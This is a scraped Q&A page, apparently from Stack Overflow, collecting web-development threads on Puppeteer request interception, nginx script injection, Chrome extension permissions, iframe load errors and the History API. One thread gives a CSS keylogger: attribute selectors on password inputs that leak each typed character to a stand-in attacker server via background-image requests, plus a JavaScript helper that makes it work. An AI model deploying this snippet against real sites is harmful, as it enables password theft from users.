How to intercept request in Puppeteer before current page is left? - puppeteer

Usecase:
We need to capture all outbound routes from a page. Some of them may not be implemented using link elements <a src="..."> but via some javascript code or as GET/POST forms.
PhantomJS:
In Phantom we did this using onNavigationRequested callback. We simply clicked at all the elements defined by some selector and used onNavigationRequested to capture the target url and possibly method or POST data in a case of form and then canceled that navigation event.
Puppeteer:
I tried request interception but at the moment request gets intercepted the current page is already lost so I would have to go back.
Is there a way how to capture the navigation event when the browser is still at the page that triggered the event and to stop it?
Thank you.

You can do the following.
await page.setRequestInterception(true);
page.on('request', request => {
if (request.resourceType() === 'image')
request.abort();
else
request.continue();
});
Example here:
https://github.com/GoogleChrome/puppeteer/blob/master/examples/block-images.js
Available resource types are listed here:
https://github.com/GoogleChrome/puppeteer/blob/master/docs/api.md#requestresourcetype

So I finally discovered the solution that doesn't require browser extension and therefore works in a headless mode:
Thx to this guy: https://github.com/GoogleChrome/puppeteer/issues/823#issuecomment-467408640
page.on('request', req => {
if (req.isNavigationRequest() && req.frame() === page.mainFrame() && req.url() !== url) {
// no redirect chain means the navigation is caused by setting `location.href`
req.respond(req.redirectChain().length
? { body: '' } // prevent 301/302 redirect
: { status: 204 } // prevent navigation by js
)
} else {
req.continue()
}
})
EDIT: We have added helper function to Apify SDK that implements this - https://sdk.apify.com/docs/api/puppeteer#puppeteer.enqueueLinksByClickingElements
Here is whole source code:
https://github.com/apifytech/apify-js/blob/master/src/enqueue_links/click_elements.js
It's slightly more complicated as it does not only need to intercept requests but additionally also catch newly opened windows, etc.

I met the same problems.Puppeteer doesn't support the feature now, actually it's chrome devtool that doesn't support it. But I found another way to solve it, using chrome extension. Related issue: https://github.com/GoogleChrome/puppeteer/issues/823
The author of the issue shared a solution
here. https://gist.github.com/GuilloOme/2bd651e5154407d2d2165278d5cd7cdb
As the doc says, we can use chrome.webRequest.onBeforeRequest.addListener to intercept all request from the page and block it if you wanna do.
Don't forget to add the following command to the puppeteer launch options:
--load-extension=./your_ext/ --disable-extensions-except=./your_ext/

page.setRequestInterception(true); The documentation has a really thorough example here: https://github.com/GoogleChrome/puppeteer/blob/master/docs/api.md#pagesetrequestinterceptionvalue.
Make sure to add some logic like in the example (and below) they avoid image requests. You would capture it and then abort each request.
page.on('request', interceptedRequest => {
if (interceptedRequest.url.endsWith('.png') ||
interceptedRequest.url.endsWith('.jpg'))
interceptedRequest.abort();
else
interceptedRequest.continue();
});

Related

How do you make a Keylogger with CSS?

input[type="password"][value$="a"] {
background-image: url("http://localhost:3000/a");
}
const inp = document.querySelector("input");
inp.addEventListener("keyup", (e) => {
inp.setAttribute('value', inp.value)
});
Is what I've found but I don't think it works. How do I do it?
Edit: I realised that the CSS snippet won't work as typing in the input field will not change the value attribute of the html element. A JavaScript function is required to do this. Hence, include the last 3 lines of your snippet in a script tag and then it should work.
The CSS Keylogger was originally a thought experiment as explained in this LiveOverflow video. The snippet you are using is assuming that http://localhost:3000/ is a malicious Web server which records your HTTP requests.
In this case entering "a" on the keyboard (in the input field) would send a request to http://localhost:3000/a (for fetching the background image) which you may intercept as "a" on the Web server. You may write a NodeJS or Python Web server to intercept these requests and get the keystrokes.

Redirect a http request to a website from within an iframe with a Reverse Proxy in front of the site

I am using nginx as a Reverse Proxy in front of a website and intercept download/preview requests for the files stored on the site. The download requests come from within an iframe and if the user is not authorised, I redirect them to the logout page. But this does not take the main page (outside of the iframe) to the logout page. Any idea how to go about this?
If the user is not authorised you may want to send a message from the iframe to its parent. On receiving the message you would then redirect the parent window to the logout page. An example implementation is found here.
However this becomes much harder if you are not able to modify the iframe page's source. Since you are using nginx, one solution would be script injection using the ngx_http_sub_module module. This module replaces one string in the response with another. Note that this module is not included by default, you may need to build nginx with the --with-http_sub_module parameter. See the module page for more information, including an example.
The iframe needs the line:
parent.postMessage( "redirect", "http://www.your-domain.com" );
To inject this with nginx you might try:
location / {
sub_filter '</head>' '<script language="javascript">parent.postMessage( "redirect", "http://www.your-domain.com" );</script></head>';
sub_filter_once on;
}
The parent window would need the corresponding code:
var eventMethod = window.addEventListener ? "addEventListener" : "attachEvent";
var eventer = window[ eventMethod ];
var messageEvent = eventMethod == "attachEvent" ? "onmessage" : "message";
// Listen to message from child window
eventer( messageEvent, function( e ) {
// normally if the message was meant to come from your domain
// you would check e.origin to verify that it's not someone
// sending messages you don't want
if ( e.data = "redirect" ) {
window.location.replace( "your-logout-url" );
}
}, false );
A more advanced solution might include the redirect url in the message; you could then handle the iframe redirecting to different locations.

Checking tab status in a chrome extension with a popup without the tabs permission

I'm currently trying to build my first chrome extension and I only need it to interact with pages of a few domains, so I want to avoid using the "tabs" permission since I understand it would have me request access to all information and all domains.
Instead I want to restrict myself to using the aciveTab permission and, if need be, a content script.
In short, what I want to do is display a "Subscribe button" in my extension's popup if the currently selected tab's url is of the domain(s) I'm interested in.
I can get the url of the page when it's created using a content script but I don't know how to make sure the user is still on that page when my extension is clicked.
I haven't managed to get anything done with activeTab.
Thanks in advance for any piece of advice you can give, I'll check on the answers (if any) after work.
A working example with the activeTab permisison:
In your popup.js
chrome.tabs.query({lastFocusedWindow: true, active: true}, function(tabs) {
if (tabs && tabs[0] && tabs[0].url) {
var match = tabs[0].url.match(/^[^:]+:\/\/([^\/]+)/);
if (match) {
var domain = match[1];
if (domain == 'stackoverflow.com')
alert('test');
}
}
});
Note:
You have to declare the "activeTab" permission in your manifest (of course).
JavaScript code must be in a standalone file and included in popup.html with <script src="..."></script>. Inline JavaScript is not allowed due to CSP.

detect iframe load error

I am loading a user-selected page into an iframe using the src property. If the load fails, I would like to report the problem in terms that will make sense to the user. iframe does not, in general, support onerror according to http://www.w3schools.com/jsref/dom_obj_frame.asp.
The page may come from the user's domain, not mine, so I cannot view the content of the iframe.
I can set a timeout and cancel it from my onload handler if the load is successful, but it would need to be a long timeout to avoid false error reports, and meanwhile Safari on my iPhone has displayed an alert that may confuse the user. Even this does not work for the Kindle Fire browser - it delivers a load event to my handler regardless of whether the load was successful.
Is there any event I can use to detect failure? Is there any way to suppress the default Safari behavior? Any way I can tell whether the load attempt has failed? (If I could do that, I could use a shorter timeout and poll until the load attempt is resolved).
I can require the use of up to date browsers, but would like a solution that is portable among as many smartphones and tablets as possible.
I have tested the AJAX Get idea, and it unfortunately does not work. A cross-domain AJAX Get to an arbitrary URI results in an exception, regardless of whether the target exists and can be loaded into the iframe or not.
You could set your iframe and/or ajax request to always call a page you control (ie: loader.php), sending loader.php the user's requested page via get. From loader.php, use curl or even just file_get_contents to fetch the external page. If the request fails to come back to loader.php, you can check the error there, and return whatever you want your iframe to display.
While my example references the use of php, curl is supported in a variety of scripting languages. It is likely more complicated than other solutions you might have, but would give you access to the response headers as well for troubleshooting why a page load failed.
As you've hinted, you'll face same-origin-policy type restrictions when you try to query anything inside the iframe if it's on a separate domain.
You could make an AJAX GET request to the iframe's URL before you pass it into the src of the frame. If you don't get an HTTP 200 response back from the AJAX call, then the site won't be able to load inside the frame either.
This will add overhead to the whole process, and is only useful if you're checking whether the iframe's document is a real URL that works. It won't help if you need to know when the iframe document has fully loaded.
If you need to know when the iframe has loaded, and it's on an external domain, then I believe you have no other option but to ask for some code to be added to those external sites to notify the parent page that they've loaded successfully.
Or, if it makes sense to do so, ask the end user to click a link to flag up that the content isn't loading correctly.
Late to the party, but I've managed to crack it:
At first, I thought to do an AJAX call like everyone else, except that it didn't work for me initially, as I had used jQuery. It works perfectly if you do a XMLHttpRequest:
var url = http://url_to_test.com/
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status != 200) {
console.log("iframe failed to load");
}
};
xhttp.open("GET", url, true);
xhttp.send();
Edit:
So this method works ok, except that it has a lot of false negatives (picks up a lot of stuff that would display in an iframe) due to cross-origin malarky. The way that I got around this was to do a CURL/Web request on a server, and then check the response headers for a) if the website exists, and b) if the headers had set x-frame-options.
This isn't a problem if you run your own webserver, as you can make your own api call for it.
My implementation in node.js:
app.get('/iframetest',function(req,res){ //Call using /iframetest?url=url - needs to be stripped of http:// or https://
var url = req.query.url;
var request = require('https').request({host: url}, function(response){ //This does an https request - require('http') if you want to do a http request
var headers = response.headers;
if (typeof headers["x-frame-options"] != 'undefined') {
res.send(false); //Headers don't allow iframe
} else {
res.send(true); //Headers don't disallow iframe
}
});
request.on('error',function(e){
res.send(false); //website unavailable
});
request.end();
});

HTML5 History API with Standard links

So, after redesigning my site, I thought I would use the HTML5 history API, when I saw brilliant use of it here: http://diveintohtml5.ep.io/examples/history/casey.html
Problem is, the code provided doesn't work for me, (using Chrome 8).
Not entirely sure why, but it simply refreshes the page with the href value of the link after the partial content is successfully loaded.
Are there any other examples of this use of the API? I dont want History.js or anything like that as that uses hash/hashbangs as a fallback. I'm trying to get rid of these.
Any ideas?
edit: Firebug throws a 'link has no value' at me as well as countless requests for the partially loaded content. After these the page refreshes
You have to intercept the link click and call your own pushState - if you check out the code on the page you will see the event handler:
function addClicker(link) {
link.addEventListener("click", function(e) {
if (swapPhoto(link.href)) {
history.pushState(null, null, link.href);
e.preventDefault();
}
}, true);
}